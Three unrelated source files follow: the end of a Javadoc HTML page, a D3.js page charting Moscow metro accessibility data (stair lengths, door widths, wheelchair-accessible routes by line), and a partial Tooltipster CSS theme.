VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?org/primefaces/event/map//class-usePointSelectEvent.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="PointSelectEvent.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright &#169; 2012. All Rights Reserved. </BODY> </HTML>
utils/index.html
nextgis/metro4all
<!DOCTYPE html> <meta charset='utf-8'> <style> body { font: 12px Arial Narrow; } text { font: 12px Arial Narrow; } .lighten { opacity: 0.3; } /* Histogram styling*/ .histPlot .title text { fill: #000; font: bold 16px Arial Narrow; } .histPlot .axis .axisLabel { fill: #000; font: 14px Arial Narrow; } .histPlot .x.axis .tick.major text { fill: #000; font: 12px Arial Narrow; } .histPlot .barLabel.italic { fill: #000; font: italic 16px Arial Narrow; } .histPlot .barLabel.bold { fill: #000; font: bold 16px Arial Narrow; } .histPlot .bar rect { fill: #ecb525; shape-rendering: crispEdges; stroke: #000; stroke-width: 1px; } /* Barplot styling*/ .barPlot .title text { fill: #000; font: bold 16px Arial Narrow; } .barPlot .axis .axisLabel { fill: #000; font: 14px Arial Narrow; } .barPlot .x.axis .tick.major text { fill: #000; font: 12px Arial Narrow; } .barPlot .barLabel.italic { fill: #000; font: italic 16px Arial Narrow; } .barPlot .barLabel.bold { fill: #000; font: bold 16px Arial Narrow; } .barPlot .bar rect { fill: #ecb525; shape-rendering: crispEdges; stroke: #000; stroke-width: 1px; } /* Double Barplot styling*/ .doubleBarPlot .title text { fill: #000; font: bold 16px Arial Narrow; } .doubleBarPlot .axis .axisLabel { fill: #000; font: 12px Arial Narrow; } .doubleBarPlot .x.axis .tick.major text { fill: #000; font: 12px Arial Narrow; } .doubleBarPlot .barLabel { fill: #000; font: bold 13px Arial Narrow; } .doubleBarPlot .bar0 rect { fill: #ecb525; shape-rendering: crispEdges; stroke: #000; stroke-width: 1px; } .doubleBarPlot .bar1 rect { fill: #5228ff; shape-rendering: crispEdges; stroke: #000; stroke-width: 1px; } /* Stacked Barplot styling*/ .stackedBarPlot .title text { fill: #000; font: bold 16px Arial Narrow; } .stackedBarPlot .axis .axisLabel { fill: #000; font: 12px Arial Narrow; } .stackedBarPlot .x.axis .tick.major text { fill: #000; font: 10px Arial Narrow; } .stackedBarPlot .barLabel.italic { fill: #000; font: italic 13px Arial Narrow; } .stackedBarPlot .barLabel.bold { fill: #000; font: bold 13px Arial Narrow; } .stackedBarPlot .bar rect { shape-rendering: crispEdges; } .axis path, .axis line { fill: none; stroke: #000; shape-rendering: crispEdges; } </style> <body> <div id='rasterPreview'></div> <script src='libs/d3.min.js'></script> <script src='libs/queue.v1.min.js'></script> <script> // A formatter for counts. var formatCount = d3.format(',.0f'), formatPercent = d3.format('.1%'); var margin = {top: 75, right: 30, bottom: 150, left: 30}, width = 750 - margin.left - margin.right, height = 500 - margin.top - margin.bottom; queue() .defer(d3.csv, 'stairsLength.csv') .defer(d3.csv, 'minRailsWidth.csv') .defer(d3.csv, 'maxRailsWidth.csv') .defer(d3.csv, 'railsSlope.csv') .defer(d3.csv, 'pandusSlope.csv') .defer(d3.csv, 'turnstileWidth.csv') .defer(d3.csv, 'doorWidth.csv') //.defer(d3.csv, 'taperWidth.csv') //.defer(d3.csv, 'doorAndTaperWidth.csv') .defer(d3.csv, 'stairwayWidth.csv') .defer(d3.csv, 'liftWidth.csv') //.defer(d3.csv, 'cabinWidth.csv') .defer(d3.csv, 'cabinDepth.csv') .defer(d3.csv, 'minTaperTransfers.csv') .defer(d3.csv, 'minStepsTransfers.csv') .defer(d3.csv, 'minRailStepsTransfers.csv') .defer(d3.csv, 'minLiftStepsTransfers.csv') .defer(d3.csv, 'minTaperStations.csv') .defer(d3.csv, 'minStepsStations.csv') .defer(d3.csv, 'minRailStepsStations.csv') .defer(d3.csv, 'minLiftStepsStations.csv') .defer(d3.csv, 'routesByLine.csv') .await(ready); function ready(error, stairsLength, minRailsWidth, maxRailsWidth, railsSlope, pandusSlope, turnstileWidth, doorWidth, stairwayWidth, liftWidth, cabinDepth, minTaperTransfers, minStepsTransfers, minRailStepsTransfers, minLiftStepsTransfers, minTaperStations, minStepsStations, minRailStepsStations, minLiftStepsStations, routesByLine) { // Calculating frequences cabinDepthFreq = frequencyData(cabinDepth, [[1250, 1400], [1400, 1550], [2200, 2250]]); minTaperTransfersFreq = frequencyData(minTaperTransfers, [[800, 900], [900, 1000], [1000, 1100]]); minStepsTransfersFreq = frequencyData(minStepsTransfers, [[20, 30], [30, 40], [40, 50], [50, 60], [60, 70], [70, 80], [80, 90]]); minRailStepsTransfersFreq = frequencyData(minRailStepsTransfers, [[20, 30], [30, 40], [40, 50], [50, 60], [60, 70], [70, 80], [80, 90]]); minLiftStepsTransfersFreq = frequencyData(minLiftStepsTransfers, [[20, 30], [30, 40], [40, 50], [50, 60], [60, 70], [70, 80], [80, 90]]); minStepsStationsFreq = frequencyData(minStepsStations, [[0, 10], [10, 20], [20, 30], [30, 40], [40, 50], [50, 60], [60, 70], [70, 80], [80, 90], [90, 100]]); minRailStepsStationsFreq = frequencyData(minRailStepsStations, [[0, 10], [10, 20], [20, 30], [30, 40], [40, 50], [50, 60], [60, 70], [70, 80], [80, 90], [90, 100]]); minLiftStepsStationsFreq = frequencyData(minLiftStepsStations, [[0, 10], [10, 20], [20, 30], [30, 40], [40, 50], [50, 60], [60, 70], [70, 80], [80, 90], [90, 100]]); drawBarplot(cabinDepthFreq, 'График 3. Глубина кабины лифтов', 'Миллиметры (мм)'); drawBarplot(minTaperTransfersFreq, 'График 17. Самое узкое место на переходах', 'Миллиметры (мм)'); plotHist(stairsLength, [0, 3, 10, 15, 20, 25, 30, 35, 40, 45, 50], 'График 6. Длина лестниц', 'Количество ступеней (шт.)'); plotHist(minRailsWidth, [250, 300, 350, 400, 450, 500], 'График 7. Минимальная ширина рельс', 'Миллиметры (мм)'); plotHist(maxRailsWidth, [500, 600, 700, 800, 900, 1000, 1100, 1200], 'График 8. Максимальная ширина рельс', 'Миллиметры (мм)'); plotHist(railsSlope, [25, 30, 35, 40, 45, 50], 'График 9. Уклон рельс', 'Проценты (%)'); plotHist(pandusSlope, [0, 5, 8, 11, 20, 40, 50], 'График 10. Уклон пандусов', 'Проценты (%)'); plotHist(turnstileWidth, [500, 600, 750, 850, 1100], 'График 11. Ширина турникетов', 'Миллиметры (мм)'); plotHist(doorWidth, [700, 800, 900, 1000, 1100], 'График 12. Ширина дверей', 'Миллиметры (мм)'); plotHist(liftWidth, [800, 850, 900, 950, 1000], 'График 2. Ширина дверного проема лифтов', 'Миллиметры (мм)'); plotHist(minStepsTransfers, [0, 10, 20, 30, 40, 50, 60, 70, 80, 90], 'График 19. Протяженность лестниц на переходах', 'Количество ступеней (шт.)'); plotHist(minRailStepsTransfers, [0, 10, 20, 30, 40, 50, 60, 70], 'Протяженность лестниц, не дублированных рельсами и пандусами, на переходах', 'Количество ступеней (шт.)'); plotHist(minLiftStepsTransfers, [0, 10, 20, 30, 40, 50, 60, 70, 80, 90], 'Протяженность лестниц, не дублированных лифтами, на переходах', 'Количество ступеней (шт.)'); plotHist(minTaperStations, [500, 600, 700, 800, 900, 1000], 'График 16. Самое узкое место на маршрутах', 'Миллиметры (мм)'); plotHist(minStepsStations, [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120], 'График 18. Протяженность лестниц на маршрутах', 'Количество ступеней (шт.)'); drawDoubleBarplot(minStepsStationsFreq, minRailStepsStationsFreq, 'График 21. Протяженность лестниц на маршрутах c учетом рельс и пандусов', 'Количество ступеней (шт.)'); plotHist(minRailStepsStations, [0, 10, 20, 30, 40, 50, 60, 70, 80, 90], 'График 20. Протяженность лестниц, не дублированных рельсами и пандусами, на маршрутах', 'Количество ступеней (шт.)'); drawDoubleBarplot(minStepsStationsFreq, minLiftStepsStationsFreq, 'График 24. Протяженность лестниц на маршрутах c учетом лифтов', 'Количество ступеней (шт.)'); plotHist(minLiftStepsStations, [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120], 'График 23. Протяженность лестниц, не дублированных лифтами, на маршрутах', 'Количество ступеней (шт.)'); drawDoubleBarplot(minStepsTransfersFreq, minRailStepsTransfersFreq, 'График Х. Протяженность лестниц на переходах c учетом рельс и пандусов', 'Количество ступеней (шт.)'); drawDoubleBarplot(minStepsTransfersFreq, minLiftStepsTransfersFreq, 'График Х. Протяженность лестниц на переходах c учетом лифтов', 'Количество ступеней (шт.)'); drawStackedBarplot(routesByLine, ['routesInByLine', 'Null'], 'График 13. Количество маршрутов на вход'); drawStackedBarplot(routesByLine, ['routesOutByLine', 'Null'], 'График 14. Количество маршрутов на выход'); drawStackedBarplot(routesByLine, ['wheelchairFriendlyRoutesInByLine', 'wheelchairNotFriendlyRoutesInByLine'], 'График 29. Количество маршрутов на вход, доступных для инвалидов-колясочников'); drawStackedBarplot(routesByLine, ['wheelchairFriendlyRoutesOutByLine', 'wheelchairNotFriendlyRoutesOutByLine'], 'График 30. Количество маршрутов на выход, доступных для инвалидов-колясочников'); drawStackedBarplot(routesByLine, ['handicappedFriendlyRoutesInByLine', 'handicappedNotFriendlyRoutesInByLine'], 'График 32. Количество маршрутов на вход, доступных для людей с затруднениями передвижения'); drawStackedBarplot(routesByLine, ['handicappedFriendlyRoutesOutByLine', 'handicappedNotFriendlyRoutesOutByLine'], 'График 33. Количество маршрутов на выход, доступных для людей с затруднениями передвижения'); drawStackedBarplot(routesByLine, ['luggageFriendlyRoutesInByLine', 'luggageNotFriendlyRoutesInByLine'], 'График 35. Количество маршрутов на вход, доступных для людей с детскими колясками и габаритным багажом'); drawStackedBarplot(routesByLine, ['luggageFriendlyRoutesOutByLine', 'luggageNotFriendlyRoutesOutByLine'], 'График 36. Количество маршрутов на выход, доступных для людей с детскими колясками и габаритным багажом'); drawStackedBarplot(routesByLine, ['stairwayAvailableRoutesByLine', 'stairwayUnavailableRoutesByLine'], 'График 26. Количество маршрутов с эскалаторами'); drawStackedBarplot(routesByLine, ['liftAvailableRoutesByLine', 'liftUnavailableRoutesByLine'], 'График 28. Количество маршрутов с лифтами'); drawStackedBarplot(routesByLine, ['transfersByLine', 'Null'], 'График 15. Количество переходов'); drawStackedBarplot(routesByLine, ['stairwayAvailableTransfersByLine', 'stairwayUnavailableTransfersByLine'], 'График 27. Количество переходов с эскалаторами'); drawStackedBarplot(routesByLine, ['wheelchairFriendlyTransfersByLine', 'wheelchairNotFriendlyTransfersByLine'], 'График 31. Количество переходов, доступных для инвалидов-колясочников'); drawStackedBarplot(routesByLine, ['handicappedFriendlyTransfersByLine', 'handicappedNotFriendlyTransfersByLine'], 'График 34. Количество переходов, доступных для людей с затруднениями передвижения'); drawStackedBarplot(routesByLine, ['luggageFriendlyTransfersByLine', 'luggageNotFriendlyTransfersByLine'], 'График 37. Количество переходов, доступных для людей с детскими колясками и габаритным багажом'); }; function plotHist(histData, bins, title, xAxisLabel) { // Generate a histogram using twenty uniformly-spaced bins. var data = d3.layout.histogram() //.bins(5) .bins(bins) (histData.map(function(d) {return +d.value})); console.log(d3.min(histData, function(d) { return (+d.value); }) + ' - ' + d3.max(histData, function(d) { return (+d.value); })); var minThreshold = d3.min(data, function(d) { return d.x; }), maxThreshold = d3.max(data, function(d) { return (d.x + d.dx); }), total = d3.sum(data, function(d) { return d.y; }); var x = d3.scale.linear() .domain([minThreshold, maxThreshold]) .range([0, width]); var y = d3.scale.linear() .domain([0, d3.max(data, function(d) { return d.y; })]) .range([height, 0]); var xAxis = d3.svg.axis() .scale(x) .tickValues(bins) .tickPadding(10) .orient('bottom'); var svg = d3.select('body').append('svg') .attr('width', width + margin.left + margin.right) .attr('height', height + margin.top + margin.bottom) //.attr('id', title) .call(xmlnsFix) .append('g') .attr('class', 'histPlot') .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')'); var bar = svg.selectAll('.bar') .data(data) .enter().append('g') .attr('class', 'bar') .attr('transform', function(d) { return 'translate(' + x(d.x) + ',' + y(d.y) + ')'; }); bar.append('rect') //.attr('x', 1) .attr('width', function(d, i) { return x(data[i].dx + minThreshold); }) .attr('height', function(d) { return height - y(d.y); }); bar.append('text') .attr('class', 'barLabel bold') //.attr('dy', '.75em') .attr('y', -26) .attr('x', function(d, i) { return x(data[i].dx + minThreshold) / 2; }) .attr('text-anchor', 'middle') .text(function(d) { return d.y > 0 ? formatCount(d.y) : ''; }); //.text(function(d) { return d.y > 0 ? formatCount(d.y) + ' (' + formatPercent(d.y/total) +') ' : ''; }); bar.append('text') .attr('class', 'barLabel italic') //.attr('dy', '.75em') .attr('y', -7) .attr('x', function(d, i) { return x(data[i].dx + minThreshold) / 2; }) .attr('text-anchor', 'middle') .text(function(d) { return d.y > 0 ? formatPercent(d.y/total) : ''; }); svg.append('g') .attr('class', 'x axis') .attr('transform', 'translate(0,' + height + ')') .call(xAxis) .append('text') .attr('transform', 'translate(' + width/2 + ',' + 2 * margin.bottom/3 + ')') //.attr('dx', '0.35em') .attr('class', 'axisLabel') //.style('font', 'bold 10px Arial') // <- X axis title .style('text-anchor', 'middle') .text(xAxisLabel); svg.append('g') .attr('class', 'y axis') //.call(yAxis) .append('text') .attr('class', 'axisLabel') //.attr('transform', 'translate(' + 0 + ',' + (-margin.top/2) + ')') .attr('transform', 'rotate(-90)') .attr('x', -height/3) .attr('y', -margin.left/2) //.attr('dy', '1.21em') .style('text-anchor', 'middle') .text('Количество'); svg.append('g') .attr('class', 'title') .attr('transform', 'translate(' + width/2 + ',' + (-margin.top/1.5) + ')') .append('text') .style('text-anchor', 'middle') .text(title); }; function drawStackedBarplot(data, stackLevels, title) { var x = d3.scale.ordinal() .rangeRoundBands([0, width], .1); var y = d3.scale.linear() .rangeRound([height, 0]); var color = d3.scale.ordinal() .range(['#3770c8', '#afc6e9', '#00aa44', '#ffd42a', '#ff7f2a', '#37c8ab', '#803200', '#abc837', '#b3b3b3', '#ff2a2a', '#bc5fd3', '#55ddff']); /* Арбатско-Покровская - #3770c8 Бутовская - #afc6e9 Замоскворецкая - #00aa44 Калининско-Солнцевская - #ffd42a Калужско-Рижская - #ff7f2a Каховская - #37c8ab Кольцевая - #803200 Люблинско-Дмитровская - #abc837 Серпуховско-Тимирязевская - #b3b3b3 Сокольническая - #ff2a2a Таганско-Краснопресненская - #bc5fd3 Филевская - #55ddff */ var xAxis = d3.svg.axis() .scale(x) //.tickValues(['АПЛ', 'БЛ', 'ЗЛ', 'КСЛ', 'КРЛ', 'КХЛ', 'КЛ', 'ЛДЛ', 'СТЛ', 'СЛ', 'ТКЛ', 'ФЛ']) // <-- Remove|Comment to show xAxis ticks .tickPadding(10) .orient('bottom'); /*var yAxis = d3.svg.axis() .scale(y) .orient('left');*/ var svg = d3.select('body').append('svg') .attr('width', width + margin.left + margin.right) .attr('height', height + margin.top + margin.bottom) //.attr('id', title) .call(xmlnsFix) .append('g') .attr('class', 'stackedBarPlot') .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')'); color.domain(data.map(function(d) { return d.lineName})); data.forEach(function(d) { var y0 = 0; //d.routes = color.domain().map(function(name) { return {name: name, y0: y0, y1: y0 += +d[name]}; }); d.routes = stackLevels.map(function(name) { return {name: name, line: d.lineName, y0: y0, y1: y0 += +d[name] } }); d.total = d.routes[d.routes.length - 1].y1; }); x.domain(data.map(function(d) { return d.lineName; })); y.domain([0, d3.max(data, function(d) { return d.total; })]); svg.append('g') .attr('class', 'x axis') .attr('transform', 'translate(0,' + height + ')') .call(xAxis) .selectAll("text") .style("text-anchor", "end") .attr('x', -10) .attr('y', +3) .call(wrap, x.rangeBand()) //.attr("dx", "-.8em") //.attr("dy", ".15em") .attr("transform", function(d) { return "rotate(-90)";}); svg.append('g') .attr('class', 'y axis') //.call(yAxis) .append('text') .attr('transform', 'rotate(-90)') .attr('class', 'axisLabel') .attr('x', -height/3) .attr('y', -margin.left/2) //.attr('dy', '1.21em') .style('text-anchor', 'end') .text('Количество'); var line = svg.selectAll('.line') .data(data) .enter().append('g') .attr('class', 'line') .attr('transform', function(d) { return 'translate(' + x(d.lineName) + ',0)'; }); var bar = line.selectAll('.bar') .data(function(d) { return d.routes; }) .enter().append('g') .attr('class', 'bar'); //.attr('transform', function(d) { return 'translate(' + y(d.y1) + ',0)'; }); bar.append('rect') .attr('class', function(d) { return d.name == stackLevels[0] ? 'bright' : 'lighten'; }) .attr('width', x.rangeBand()) .attr('y', function(d) { return y(d.y1); }) .attr('height', function(d) { return y(d.y0) - y(d.y1); }) .style('fill', function(d) { return color(d.line);}); //Simple barLabel /*var barLabel = bar.append('text') .attr('class', 'barLabel bold') //.attr('dy', '.75em') .attr('y', function(d) { return y(d.y1) - 5; }) .attr('x', x.rangeBand() / 2) .attr('text-anchor', 'middle') .text(function(d) { return d.y1 > 0 ? formatCount(d.y1) : ''; });*/ //Stacked barLabels var barLabel = bar.append('text') .attr('class', 'barLabel') //.attr('dy', '.75em') .attr('text-anchor', 'middle') .text(null); barLabel.append("tspan").attr('x', x.rangeBand() / 2).attr('y', function(d) { return y(d.y1) - 20; }).text(function(d) { return d.name == stackLevels[1] ? formatCount(d.y0) + ' из ' + formatCount(d.y1) : ''; }).style('font-weight', 'bold'); barLabel.append("tspan").attr('x', x.rangeBand() / 2).attr('y', function(d) { return y(d.y1) - 5; }).text(function(d) { return d.name == stackLevels[1] ? formatPercent(d.y0/d.y1) : ''; }).style('font-style', 'italic'); svg.append('g') .attr('class', 'title') .attr('transform', 'translate(' + width/2 + ',' + (-margin.top/2) + ')') .append('text') .style('text-anchor', 'middle') .text(title); }; function drawBarplot(data, title) { var x = d3.scale.ordinal() .rangeRoundBands([0, width], .1); var y = d3.scale.linear() .rangeRound([height, 0]); var xAxis = d3.svg.axis() .scale(x) //.tickValues() // <-- Remove|Comment to show xAxis ticks .tickPadding(10) .orient('bottom'); /*var yAxis = d3.svg.axis() .scale(y) .orient('left');*/ var total = d3.sum(data, function(d) { return d.frequency; }); var svg = d3.select('body').append('svg') .attr('width', width + margin.left + margin.right) .attr('height', height + margin.top + margin.bottom) //.attr('id', title) .call(xmlnsFix) .append('g') .attr('class', 'barPlot') .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')'); x.domain(data.map(function(d) { return d.range; })); y.domain([0, d3.max(data, function(d) { return d.frequency; })]); svg.append('g') .attr('class', 'x axis') .attr('transform', 'translate(0,' + height + ')') .call(xAxis); svg.append('g') .attr('class', 'y axis') //.call(yAxis) .append('text') .attr('transform', 'rotate(-90)') .attr('class', 'axisLabel') .attr('x', -height/3) .attr('y', -margin.left/2) //.attr('dy', '1.21em') .style('text-anchor', 'end') .text('Количество'); var bar = svg.selectAll('.bar') .data(data) .enter().append('g') .attr('class', 'bar') .attr('transform', function(d) { return 'translate(' + x(d.range) + ',0)'; }); bar.append('rect') .attr('width', x.rangeBand()) .attr("y", function(d) { return y(d.frequency); }) .attr("height", function(d) { return height - y(d.frequency); }); bar.append('text') .attr('class', 'barLabel bold') //.attr('dy', '.75em') .attr('y', function(d) { return y(d.frequency) - 7; }) .attr('x', x.rangeBand() / 2) .attr('text-anchor', 'middle') .text(function(d) { return d.frequency > 0 ? formatCount(d.frequency) + ' (' + formatPercent(d.frequency/total) +') ' : ''; }); svg.append('g') .attr('class', 'title') .attr('transform', 'translate(' + width/2 + ',' + (-margin.top/2) + ')') .append('text') .style('text-anchor', 'middle') .text(title); }; function drawDoubleBarplot(data, data2, title) { var x = d3.scale.ordinal() .rangeRoundBands([0, width], .3); var y = d3.scale.linear() .rangeRound([height, 0]); var xAxis = d3.svg.axis() .scale(x) //.tickValues() // <-- Remove|Comment to show xAxis ticks .tickPadding(10) .orient('bottom'); /*var yAxis = d3.svg.axis() .scale(y) .orient('left');*/ var total = d3.sum(data, function(d) { return d.frequency; }); var svg = d3.select('body').append('svg') .attr('width', width + margin.left + margin.right) .attr('height', height + margin.top + margin.bottom) //.attr('id', title) .call(xmlnsFix) .append('g') .attr('class', 'doubleBarPlot') .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')'); var maxFreq = d3.max([d3.max(data, function(d) { return d.frequency; }), d3.max(data2, function(d) { return d.frequency; })]); x.domain(data.map(function(d) { return d.range; })); y.domain([0, maxFreq]); //y.domain([0, d3.max(data, function(d) { return d.frequency; })]); svg.append('g') .attr('class', 'x axis') .attr('transform', 'translate(0,' + height + ')') .call(xAxis); svg.append('g') .attr('class', 'y axis') //.call(yAxis) .append('text') .attr('transform', 'rotate(-90)') .attr('class', 'axisLabel') .attr('x', -height/3) .attr('y', -margin.left/2) //.attr('dy', '1.21em') .style('text-anchor', 'end') .text('Количество'); var bar0 = svg.selectAll('.bar0') .data(data) .enter().append('g') .attr('class', 'bar0') .attr('transform', function(d) { return 'translate(' + x(d.range) + ',0)'; }); bar0.append('rect') .attr('width', x.rangeBand()/2) .attr("y", function(d) { return y(d.frequency); }) .attr("height", function(d) { return height - y(d.frequency); }); bar0.append('text') .attr('class', 'barLabel') //.attr('dy', '.75em') .attr('y', function(d) { return y(d.frequency) - 5; }) .attr('x', x.rangeBand() / 4) .attr('text-anchor', 'middle') .text(function(d) { return d.frequency > 0 ? formatCount(d.frequency) : ''; }); var bar1 = svg.selectAll('.bar1') .data(data2) .enter().append('g') .attr('class', 'bar1') .attr('transform', function(d) { return 'translate(' + x(d.range) + ',0)'; }); bar1.append('rect') .attr('width', x.rangeBand()/2) .attr("x", x.rangeBand()/2) .attr("y", function(d) { return y(d.frequency); }) .attr("height", function(d) { return height - y(d.frequency); }); bar1.append('text') .attr('class', 'barLabel') //.attr('dy', '.75em') .attr('y', function(d) { return y(d.frequency) - 5; }) .attr('x', 3 * x.rangeBand() / 4) .attr('text-anchor', 'middle') .text(function(d) { return d.frequency > 0 ? formatCount(d.frequency) : ''; }); svg.append('g') .attr('class', 'title') .attr('transform', 'translate(' + width/2 + ',' + (-margin.top/2) + ')') .append('text') .style('text-anchor', 'middle') .text(title); }; function frequencyData(data, ranges) { var freqData = []; //Nest data by values(groupping) var nest = d3.nest() .key(function(d) { return +d.value; }).sortKeys(d3.ascending) .rollup(function(leaves) { return leaves.length; }) .entries(data); //Calculate frequency for range function frequency(nest, range) { var result = {range: range[0] + ' - ' + range[1], frequency: 0}; nest.forEach(function(d) { if ((Number(d.key) >= range[0]) && (Number(d.key) < range[1])) { result.frequency += d.values; }; }); return result; }; //Push ranges and frequency to array ranges.forEach(function(d) { freqData.push(frequency(nest, d)); }); //Sorting ranges freqData.sort(function(a, b) { return a.range.split('-')[0] - b.range.split('-')[0]; }); return freqData; }; function wrap(text, width) { text.each(function() { var text = d3.select(this), words = text.text().split('-').reverse(), word, lineNumber = 0, lineHeight = 10, // px x = text.attr("x") y = text.attr("y"), text.text(null); while (word = words.pop()) { text.append("tspan").attr("x", x).attr("y", parseInt(y) + (lineNumber++ * lineHeight)) .text(function() { return words.length == 0 ? word : word + '-';}); } }); } function xmlnsFix(svg) { // removing attributes so they aren't doubled up svg.node().removeAttribute('xmlns'); svg.node().removeAttribute('xlink'); // These are needed for for valid SVG 1.1 if (!svg.node().hasAttributeNS(d3.ns.prefix.xmlns, 'xmlns')) { svg.node().setAttributeNS(d3.ns.prefix.xmlns, 'xmlns', d3.ns.prefix.svg); } if (!svg.node().hasAttributeNS(d3.ns.prefix.xmlns, 'xmlns:xlink')) { svg.node().setAttributeNS(d3.ns.prefix.xmlns, 'xmlns:xlink', d3.ns.prefix.xlink); } }; </script> </body>
wp-content/themes/truemag/css/tooltipster.css
davidHuanghw/david_blog
html { -webkit-font-smoothing: antialiased; } /* This is the default Tooltipster theme (feel free to modify or duplicate and create multiple themes!): */ .tooltipster-default { border-radius: 0; max-width:250px !important; border: 1px solid #cfcfcf; background: #fff; border-radius:3px; color: #8e8e8e; -webkit-box-shadow: 2px 2px 8px rgba(0,0,0,0.5); -moz-box-shadow: 2px 2px 8px rgba(0,0,0,0.5); box-shadow: 2px 2px 8px rgba(0,0,0,0.5); } .tooltipster-arrow-border{border-color:#cfcfcf !important;} /* Use this next selector to style things like font-size and line-height: */ .tooltipster-default .tooltipster-content { font-family: Arial, sans-serif; font-size: 13px; line-height: 16px; padding: 12px 19px 20px 19px; overflow: hidden; } /* This next selector defines the color of the border on the outside of the arrow. This will automatically match the color and size of the border set on the main tooltip styles. Set display: none; if you would like a border around the tooltip but no border around the arrow */ .tooltipster-default .tooltipster-arrow .tooltipster-arrow-border { /* border-color: ... !important; */ } /* If you're using the icon option, use this next selector to style them */ .tooltipster-icon { cursor: help; margin-left: 4px; } /* This is the base styling required to make all Tooltipsters work */ .tooltipster-base { padding: 0; font-size: 0; line-height: 0; position: absolute; z-index: 9999999; pointer-events: none; width: auto; overflow: visible; } .tooltipster-base .tooltipster-content { overflow: hidden; } /* These next classes handle the styles for the little arrow attached to the tooltip. By default, the arrow will inherit the same colors and border as what is set on the main tooltip itself. */ .tooltipster-arrow { display: block; text-align: center; width: 100%; height: 100%; position: absolute; top: 0; left: 0; z-index: -1; } .tooltipster-arrow span, .tooltipster-arrow-border { display: block; width: 0; height: 0; position: absolute; } .tooltipster-arrow-top span, .tooltipster-arrow-top-right span, .tooltipster-arrow-top-left span { border-left: 8px solid transparent !important; border-right: 8px solid transparent !important; border-top: 8px solid; bottom: -7px; } .tooltipster-arrow-top .tooltipster-arrow-border, .tooltipster-arrow-top-right .tooltipster-arrow-border, .tooltipster-arrow-top-left .tooltipster-arrow-border { border-left: 9px solid transparent !important; border-right: 9px solid transparent !important; border-top: 9px solid; bottom: -7px; } .tooltipster-arrow-bottom span, .tooltipster-arrow-bottom-right span, .tooltipster-arrow-bottom-left span { border-left: 8px solid transparent !important; border-right: 8px solid transparent !important; border-bottom: 8px solid; top: -7px; } .tooltipster-arrow-bottom .tooltipster-arrow-border, .tooltipster-arrow-bottom-right .tooltipster-arrow-border, .tooltipster-arrow-bottom-left .tooltipster-arrow-border { border-left: 9px solid transparent !important; border-right: 9px solid transparent !important; border-bottom: 9px solid; top: -7px; } .tooltipster-arrow-top span, .tooltipster-arrow-top .tooltipster-arrow-border, .tooltipster-arrow-bottom span, .tooltipster-arrow-bottom .tooltipster-arrow-border { left: 0; right: 0; margin: 0 auto; } .tooltipster-arrow-top-left span, .tooltipster-arrow-bottom-left span { left: 6px; } .tooltipster-arrow-top-left .tooltipster-arrow-border, .tooltipster-arrow-bottom-left .tooltipster-arrow-border { left: 5px; } .tooltipster-arrow-top-right span, .tooltipster-arrow-bottom-right span { right: 6px; } .tooltipster-arrow-top-right .tooltipster-arrow-border, .tooltipster-arrow-bottom-right .tooltipster-arrow-border { right: 5px; } .tooltipster-arrow-left span, .tooltipster-arrow-left .tooltipster-arrow-border { border-top: 8px solid transparent !important; border-bottom: 8px solid transparent !important; border-left: 8px solid; top: 50%; margin-top: -7px; right: -7px; } .tooltipster-arrow-left .tooltipster-arrow-border { border-top: 9px solid transparent !important; border-bottom: 9px solid transparent !important; border-left: 9px solid; margin-top: -8px; } .tooltipster-arrow-right span, .tooltipster-arrow-right .tooltipster-arrow-border { border-top: 8px solid transparent !important; border-bottom: 8px solid transparent !important; border-right: 8px solid; top: 50%; margin-top: -7px; left: -7px; } .tooltipster-arrow-right .tooltipster-arrow-border { border-top: 9px solid transparent !important; border-bottom: 9px solid transparent !important; border-right: 9px solid; margin-top: -8px; } /* Some CSS magic for the awesome animations - feel free to make your own custom animations and reference it in your Tooltipster settings! */ .tooltipster-fade { opacity: 0; -webkit-transition-property: opacity; -moz-transition-property: opacity; -o-transition-property: opacity; -ms-transition-property: opacity; transition-property: opacity; } .tooltipster-fade-show { opacity: 1; } .tooltipster-grow { -webkit-transform: scale(0,0); -moz-transform: scale(0,0); -o-transform: scale(0,0); -ms-transform: scale(0,0); transform: scale(0,0); -webkit-transition-property: -webkit-transform; -moz-transition-property: -moz-transform; -o-transition-property: -o-transform; -ms-transition-property: -ms-transform; transition-property: transform; -webkit-backface-visibility: hidden; } .tooltipster-grow-show { -webkit-transform: scale(1,1); -moz-transform: scale(1,1); -o-transform: scale(1,1); -ms-transform: scale(1,1); transform: scale(1,1); -webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1); -webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); -moz-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); -ms-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); -o-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); } .tooltipster-swing { opacity: 0; -webkit-transform: rotateZ(4deg); -moz-transform: rotateZ(4deg); -o-transform: rotateZ(4deg); -ms-transform: rotateZ(4deg); transform: rotateZ(4deg); -webkit-transition-property: -webkit-transform, opacity; -moz-transition-property: -moz-transform; -o-transition-property: -o-transform; -ms-transition-property: -ms-transform; transition-property: transform; } .tooltipster-swing-show { opacity: 1; -webkit-transform: rotateZ(0deg); -moz-transform: rotateZ(0deg); -o-transform: rotateZ(0deg); -ms-transform: rotateZ(0deg); transform: 